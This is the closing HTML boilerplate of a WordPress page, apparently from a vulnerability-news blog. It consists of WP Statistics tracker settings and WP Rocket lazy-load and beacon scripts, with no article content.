{"requestUrl":"https:\/\/blog.cve-20.fyi\/wp-json\/wp-statistics\/v2","ajaxUrl":"https:\/\/blog.cve-20.fyi\/wp-admin\/admin-ajax.php","hitParams":{"wp_statistics_hit":1,"source_type":"post","source_id":20707,"search_query":"","signature":"ceb3a5561e243d29da55d766adcaa4e8","endpoint":"hit"},"onlineParams":{"wp_statistics_hit":1,"source_type":"post","source_id":20707,"search_query":"","signature":"ceb3a5561e243d29da55d766adcaa4e8","endpoint":"online"},"option":{"userOnline":"1","dntEnabled":"","bypassAdBlockers":"","consentIntegration":{"name":null,"status":[]},"isPreview":false,"trackAnonymously":false,"isWpConsentApiActive":false,"consentLevel":"disabled"},"jsCheckTime":"60000","isLegacyEventLoaded":""}; /* ]]> */ </script> <script data-minify="1" type="text/javascript" src="https://blog.cve-20.fyi/wp-content/cache/min/1/wp-content/plugins/wp-statistics/assets/js/tracker.js?ver=1753666820" id="wp-statistics-tracker-js" data-rocket-defer defer></script> <script>window.lazyLoadOptions=[{elements_selector:"img[data-lazy-src],.rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}},{elements_selector:".rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,}];window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue} if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue} images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1} if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://blog.cve-20.fyi/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js"></script> <script>var rocket_beacon_data = {"ajax_url":"https:\/\/blog.cve-20.fyi\/wp-admin\/admin-ajax.php","nonce":"31033fb44d","url":"https:\/\/blog.cve-20.fyi\/archives\/20707","is_mobile":false,"width_threshold":1600,"height_threshold":700,"delay":500,"debug":null,"status":{"atf":true,"lrc":true,"preconnect_external_domain":true},"elements":"img, video, picture, p, main, div, li, svg, section, header, span","lrc_threshold":1800,"preconnect_external_domain_elements":["link","script","iframe"],"preconnect_external_domain_exclusions":["static.cloudflareinsights.com","rel=\"profile\"","rel=\"preconnect\"","rel=\"dns-prefetch\"","rel=\"icon\""]}</script><script data-name="wpr-wpr-beacon" src='https://blog.cve-20.fyi/wp-content/plugins/wp-rocket/assets/js/wpr-beacon.min.js' async></script></body> </html> <!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1756298031 -->